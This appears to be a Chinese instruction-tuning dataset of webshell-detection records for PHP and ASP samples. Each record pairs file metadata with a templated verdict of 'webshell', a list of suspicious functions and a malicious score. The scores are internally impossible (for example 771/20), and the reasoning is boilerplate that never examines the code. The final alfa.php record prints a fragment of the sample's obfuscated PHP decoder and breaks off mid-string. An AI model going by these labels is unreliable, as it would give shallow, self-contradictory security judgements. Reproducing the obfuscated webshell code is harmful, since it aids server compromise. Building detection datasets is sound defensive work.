{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"4a1a28dec35e173b51ef6480f4ac307b.php\", \"文件类型\": \"php\", \"文件大小\": \"112002 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/4a1a28dec35e173b51ef6480f4ac307b.php", "malicious_score": 13, "md5_hash": "392d49128747c609c565e22fd3d38c4f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"65fe33416bc244ea3fbd1beff4809871.php\", \"文件类型\": \"php\", \"文件大小\": \"147 bytes\", \"行数\": 10}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/65fe33416bc244ea3fbd1beff4809871.php", "malicious_score": 6, "md5_hash": "5bcba70b2137375225d8eedcde2c0ebb"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"40ab2eb6afa30df156b4c408a7a3317b.php\", \"文件类型\": \"php\", \"文件大小\": \"54 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/40ab2eb6afa30df156b4c408a7a3317b.php", "malicious_score": 8, "md5_hash": "a3e6d7d37079dbefc5d9d3bdb8936173"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b940f0e06b6cd558be898e003d4741f3.php\", \"文件类型\": \"php\", \"文件大小\": \"189 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/b940f0e06b6cd558be898e003d4741f3.php", "malicious_score": 8, "md5_hash": "9305d71f61bdfe96c8ace7a31a006c72"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sucuri_20200811.php\", \"文件类型\": \"php\", \"文件大小\": \"320 bytes\", \"行数\": 5}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[ 发现混淆技术: base64_decode 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/sucuri_20200811.php", "malicious_score": 14, "md5_hash": "ee9141d9bcc42d639ca15a446b4fa284"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cd3d1cc6e477b590d1b89a6ee805808e.php\", \"文件类型\": \"php\", \"文件大小\": \"392 bytes\", \"行数\": 10}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, file_get_contents(, create_function(, $_POST[, call_user_func( 发现混淆技术: pack\\s*\\( 恶意度评分: 29/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/cd3d1cc6e477b590d1b89a6ee805808e.php", "malicious_score": 29, "md5_hash": "8c765dd11adacdc4e8aebda8484c349c"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"acca4fd629f8caf57d0a69ac1fb2c2c9.php\", \"文件类型\": \"php\", \"文件大小\": \"145 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/acca4fd629f8caf57d0a69ac1fb2c2c9.php", "malicious_score": 9, "md5_hash": "d38920b1f6aa9bcc976df1f350e5963f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jatayu.php\", \"文件类型\": \"php\", \"文件大小\": \"412 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/jatayu.php", "malicious_score": 9, "md5_hash": "c5b21c4e6356af6fab6151e8cea317f3"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHANTASMA.php\", \"文件类型\": \"php\", \"文件大小\": \"25944 bytes\", \"行数\": 634}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/PHANTASMA.php", "malicious_score": 15, "md5_hash": "bde97ee8db425dec23448e6f8332a346"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a809f8a06ef7331e42977dc7791fd93c.php\", \"文件类型\": \"php\", \"文件大小\": \"47 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: str_rot13(, eval( 发现混淆技术: str_rot13 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/a809f8a06ef7331e42977dc7791fd93c.php", "malicious_score": 8, "md5_hash": "20ede5b8182d952728d594e6f2bb5c76"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"simple-backdoor.php\", \"文件类型\": \"php\", \"文件大小\": \"328 bytes\", \"行数\": 17}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, system( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/simple-backdoor.php", "malicious_score": 9, "md5_hash": "f091d1b9274c881f8e41b2f96e6b9936"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"9d9a00a103a29a026d0e484ae254ec36.php\", \"文件类型\": \"php\", \"文件大小\": \"284 bytes\", \"行数\": 11}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/f/e, $_GET[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/9d9a00a103a29a026d0e484ae254ec36.php", "malicious_score": 15, "md5_hash": "14c7281fdaf2ae004ca5fec8753ce3cb"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"75b85c77d6627503523fb92ff227e932.php\", \"文件类型\": \"php\", \"文件大小\": \"94 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, eval(, $_GET[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/75b85c77d6627503523fb92ff227e932.php", "malicious_score": 9, "md5_hash": "fbf2e76e6f897f6f42b896c855069276"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"9110aafcc8c8fe01f410ab8d8724808e.php\", \"文件类型\": \"php\", \"文件大小\": \"187 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, $_GET[ 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/9110aafcc8c8fe01f410ab8d8724808e.php", "malicious_score": 12, "md5_hash": "7c5b1b30196c51f1accbffb80296395f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"yjh.php\", \"文件类型\": \"php\", \"文件大小\": \"1109 bytes\", \"行数\": 61}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_REQUEST[, file_get_contents(, fputs(, eval ( 发现混淆技术: base64_decode, pack\\s*\\( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\( 恶意度评分: 60/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/yjh.php", "malicious_score": 60, "md5_hash": "926ae4428b415f6ef751f4b9312239a3"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"7fd95a934ecb8d10ad8e1afe694a0944.php\", \"文件类型\": \"php\", \"文件大小\": \"70 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, system( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/7fd95a934ecb8d10ad8e1afe694a0944.php", "malicious_score": 6, "md5_hash": "2abbc82d32135e768a4258c0e56a2544"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"d0d6fe487395f5af26049a71d6eaa740.php\", \"文件类型\": \"php\", \"文件大小\": \"21008 bytes\", \"行数\": 255}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_COOKIE[, gzinflate(, create_function( 发现混淆技术: gzinflate, ord\\s*\\(, chr\\s*\\( 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/d0d6fe487395f5af26049a71d6eaa740.php", "malicious_score": 21, "md5_hash": "e67ef9481220842444ab0c69dfb7e0b5"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1a2c9a1ac7403920d128e66f2200fcee.php\", \"文件类型\": \"php\", \"文件大小\": \"70620 bytes\", \"行数\": 1724}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/1a2c9a1ac7403920d128e66f2200fcee.php", "malicious_score": 13, "md5_hash": "5c1c8120d82f46ff9d813fbe3354bac5"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1bf1b1d856964dedbfa453574207f33f.php\", \"文件类型\": \"php\", \"文件大小\": \"425 bytes\", \"行数\": 10}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: system(, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/1bf1b1d856964dedbfa453574207f33f.php", "malicious_score": 6, "md5_hash": "3c30399e7480c09276f412271f60ed01"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"f1290186a5d0b1ceab27f4e77c0c5d68.php\", \"文件类型\": \"php\", \"文件大小\": \"377 bytes\", \"行数\": 18}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, eval( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/f1290186a5d0b1ceab27f4e77c0c5d68.php", "malicious_score": 6, "md5_hash": "ce6a53536ea70c8586f73d44cfa942cd"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"eeb938eb3829abd58fc595dafb60fe63.php\", \"文件类型\": \"php\", \"文件大小\": \"2975 bytes\", \"行数\": 102}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: shell_exec(, fputs(, exec(, fputs (, base64_decode( 发现混淆技术: base64_decode 包含网络功能: fsockopen 恶意度评分: 60/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/eeb938eb3829abd58fc595dafb60fe63.php", "malicious_score": 60, "md5_hash": "d0005805094e03f6c226cce5895878b3"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2.php\", \"文件类型\": \"php\", \"文件大小\": \"32 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_REQUEST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/2.php", "malicious_score": 6, "md5_hash": "267c37c3a285a84f541066fc5b3c1747"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"83878c91171338902e0fe0fb97a8c47a.php\", \"文件类型\": \"php\", \"文件大小\": \"74 bytes\", \"行数\": 6}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_POST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/83878c91171338902e0fe0fb97a8c47a.php", "malicious_score": 6, "md5_hash": "769a354464d8e9d69038eca3d8c2f96c"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"f694b2486701e8c79aa8a8d1daf49231.php\", \"文件类型\": \"php\", \"文件大小\": \"294 bytes\", \"行数\": 15}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"/[errorpage]/e, $_REQUEST[, $_POST[, $_GET[ 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/f694b2486701e8c79aa8a8d1daf49231.php", "malicious_score": 15, "md5_hash": "ea75280224a735f1e445d244acdfeb7b"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"accept_language.php\", \"文件类型\": \"php\", \"文件大小\": \"328 bytes\", \"行数\": 17}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, system( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/accept_language.php", "malicious_score": 9, "md5_hash": "f091d1b9274c881f8e41b2f96e6b9936"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"79c0b5cc5aa2c63387c8667ffca70d3e.php\", \"文件类型\": \"php\", \"文件大小\": \"10988 bytes\", \"行数\": 3}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/79c0b5cc5aa2c63387c8667ffca70d3e.php", "malicious_score": 8, "md5_hash": "59d9dd1c7efa58dbec5a72a365022481"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"backupsql.php\", \"文件类型\": \"php\", \"文件大小\": \"6331 bytes\", \"行数\": 170}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, shell_exec(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/backupsql.php", "malicious_score": 14, "md5_hash": "ab1a06ab1a1fe94e3f3b7f80eedbc12f"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"e2ac255ade95b9268571eb5baf345974.php\", \"文件类型\": \"php\", \"文件大小\": \"94 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, str_rot13(, preg_replace('/ad/e 发现混淆技术: str_rot13 恶意度评分: 11/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/e2ac255ade95b9268571eb5baf345974.php", "malicious_score": 11, "md5_hash": "9e69a8f499c660ee0b4796af14dc08f0"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"TeSt.php\", \"文件类型\": \"php\", \"文件大小\": \"213 bytes\", \"行数\": 13}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fputs(, fwrite ( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/xiaoma/TeSt.php", "malicious_score": 8, "md5_hash": "77e331abd03b6915c6c6c7fe999fcb50"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"klasvayv.asp\", \"文件类型\": \"asp\", \"文件大小\": \"33731 bytes\", \"行数\": 901}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Request.querystring, request.querystring, CreateObject(, response.write 恶意度评分: 123/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/klasvayv.asp", "malicious_score": 123, "md5_hash": "bb2b84369092c377222938d273c3af3b"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"338644dd49c70904c7600be51f34843a.asp\", \"文件类型\": \"asp\", \"文件大小\": \"34427 bytes\", \"行数\": 827}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Request.querystring, Request.QueryString, request.querystring 发现混淆技术: chr\\s*\\( 恶意度评分: 440/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/338644dd49c70904c7600be51f34843a.asp", "malicious_score": 440, "md5_hash": "1c9a0f1529ddca43d91eb9b16c6aa6a4"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xunitiquan.asp\", \"文件类型\": \"asp\", \"文件大小\": \"88816 bytes\", \"行数\": 1296}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, REsPonsE.WritE 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 771/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/xunitiquan.asp", "malicious_score": 771, "md5_hash": "bdfae49a25632fba9b44f05dc1240283"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"7474da9b5238d572228aaa3e76323745.asp\", \"文件类型\": \"asp\", \"文件大小\": \"89245 bytes\", \"行数\": 1870}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cREATEObjECt(, wscript.shell, Cmd.exe, eval(, request.form 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 375/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/7474da9b5238d572228aaa3e76323745.asp", "malicious_score": 375, "md5_hash": "3e7589d4ce04b8169107358d97cb3527"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"alfa.php\", \"文件类型\": \"php\", \"文件大小\": \"524071 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: preg_replace(\"[^A-\\x5a\\x61-\\x7a\\x30-\\x39\\x5c+\\\\/\\x5c=]\",\"\",${${\"\\x47\\x4cOBA\\x4cS\"}[\"\\x6a\\x71e\\x64\\x6b\\x78\\x6c\\x6atlwl\"]});${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x64\\x68xwt\\x6e\\x6b\"]=\"ou\\x74\\x70u\\x74\";do{${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x77\\x73m\\x65\\x6df\\x79\\x68y\\x65\"]=\"i\\x6e\\x70\\x75t\";$lmbcdbfbweg=\"\\x69n\\x70\\x75\\x74\";${\"\\x47L\\x4f\\x42\\x41LS\"}[\"dv\\x68\\x6b\\x66\\x77\\x73nt\\x68\"]=\"\\x6be\\x79S\\x74\\x72\";${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"\\x69\\x6b\\x66sl\\x63\\x6f\"]=\"\\x65n\\x63\\x32\";$yogxsxqpl=\"e\\x6e\\x63\\x33\";$bdgblgrrl=\"c\\x68\\x72\\x31\";$wmumelmp=\"i\";${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"yd\\x6e\\x75\\x77\\x68\\x6a\"]}=strpos(${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"n\\x77\\x6cg\\x66\\x68w\\x63\"]},substr(${$lmbcdbfbweg},${$wmumelmp}++,1));${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6e\\x62u\\x77\\x65\\x69ih\\x78\\x66\\x68\"]=\"\\x6be\\x79St\\x72\";${\"G\\x4c\\x4f\\x42AL\\x53\"}[\"\\x69t\\x67\\x63\\x63n\\x67c\\x65\\x7a\\x77o\"]=\"\\x65n\\x633\";${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x77\\x6c\\x7a\\x61ah\\x64\\x67\\x6a\\x78\"]}=strpos(${${\"GL\\x4fB\\x41\\x4c\\x53\"}[\"dv\\x68k\\x66\\x77\\x73n\\x74h\"]},substr(${${\"G\\x4c\\x4f\\x42AL\\x53\"}[\"\\x66r\\x7am\\x68\\x68\\x64\"]},${${\"\\x47LOB\\x41\\x4cS\"}[\"\\x75\\x67\\x72\\x61\\x75\\x63\\x61\\x6bb\\x6c\"]}++,1));$ixtudtdjed=\"en\\x63\\x34\";$eeigua=\"\\x6b\\x65\\x79\\x53\\x74\\x72\";$swinolm=\"\\x69\";$pcmjurbt=\"\\x63hr3\";${${\"G\\x4cO\\x42ALS\"}[\"\\x6dgy\\x65\\x6f\\x65rz\\x6e\\x74g\"]}=strpos(${$eeigua},substr(${${\"\\x47LOB\\x41L\\x53\"}[\"\\x66\\x72\\x7a\\x6d\\x68\\x68\\x64\"]},${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x75\\x67\\x72a\\x75\\x63\\x61k\\x62\\x6c\"]}++,1));${${\"\\x47L\\x4fB\\x41\\x4cS\"}[\"\\x7at\\x72\\x71\\x6ed\\x74\\x74\\x74ua\\x71\"]}=strpos(${${\"G\\x4cO\\x42A\\x4c\\x53\"}[\"n\\x62\\x75wei\\x69\\x68\\x78f\\x68\"]},substr(${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x77\\x73\\x6d\\x65mfy\\x68\\x79\\x65\"]},${$swinolm}++,1));${${\"GLOB\\x41\\x4c\\x53\"}[\"\\x77y\\x64d\\x6b\\x73\\x64\\x70u\"]}=(${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"y\\x64\\x6e\\x75\\x77\\x68\\x6a\"]}<<2)|(${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"ik\\x66s\\x6c\\x63o\"]}>>4);${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x73\\x72u\\x63\\x77\\x69\\x74\\x68\"]}=((${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x77l\\x7aa\\x61\\x68d\\x67jx\"]}&15)<<4)|(${${\"\\x47\\x4c\\x4fBA\\x4cS\"}[\"m\\x67y\\x65\\x6f\\x65\\x72\\x7a\\x6e\\x74g\"]}>>2);${$pcmjurbt}=((${${\"\\x47LO\\x42\\x41L\\x53\"}[\"\\x6d\\x67\\x79\\x65o\\x65\\x72\\x7a\\x6e\\x74\\x67\"]}&3)<<6)|${$ixtudtdjed};${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x68\\x70e\\x65c\\x77\\x6b\"]}=${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x68p\\x65\\x65\\x63\\x77k\"]}.chr((int)${${\"\\x47L\\x4fB\\x41\\x4cS\"}[\"\\x77y\\x64\\x64\\x6bsdp\\x75\"]});if(${$yogxsxqpl}!=64){${\"\\x47L\\x4fBA\\x4cS\"}[\"\\x75\\x6aw\\x64\\x73\\x6d\\x68g\\x73\\x6er\"]=\"ch\\x72\\x32\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x6ae\\x69\\x68\\x6f\\x74\"]=\"\\x6f\\x75\\x74p\\x75t\";${${\"G\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"hp\\x65\\x65c\\x77\\x6b\"]}=${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x6a\\x65\\x69\\x68\\x6ft\"]}.chr((int)${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75j\\x77\\x64\\x73m\\x68gs\\x6er\"]});}if(${${\"G\\x4c\\x4fB\\x41L\\x53\"}[\"\\x7a\\x74\\x72\\x71nd\\x74\\x74t\\x75\\x61\\x71\"]}!=64){${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"\\x68p\\x65\\x65\\x63\\x77\\x6b\"]}=${${\"GLOBAL\\x53\"}[\"h\\x70\\x65\\x65\\x63w\\x6b\"]}.chr((int)${${\"\\x47\\x4cOBALS\"}[\"\\x73g\\x68j\\x73dr\\x67\\x71\\x6e\"]});}${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6e\\x6aq\\x6aw\\x75\"]=\"\\x63\\x68r3\";${$bdgblgrrl}=${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x73\\x72\\x75\\x63w\\x69\\x74h\"]}=${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"nj\\x71j\\x77\\x75\"]}=\"\";${${\"\\x47L\\x4f\\x42AL\\x53\"}[\"\\x79d\\x6e\\x75\\x77\\x68\\x6a\"]}=${${\"GL\\x4f\\x42A\\x4cS\"}[\"\\x77l\\x7aa\\x61\\x68d\\x67\\x6a\\x78\"]}=${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x69\\x74\\x67\\x63\\x63\\x6eg\\x63e\\x7a\\x77\\x6f\"]}=${${\"GL\\x4f\\x42\\x41\\x4cS\"}[\"ztrq\\x6e\\x64\\x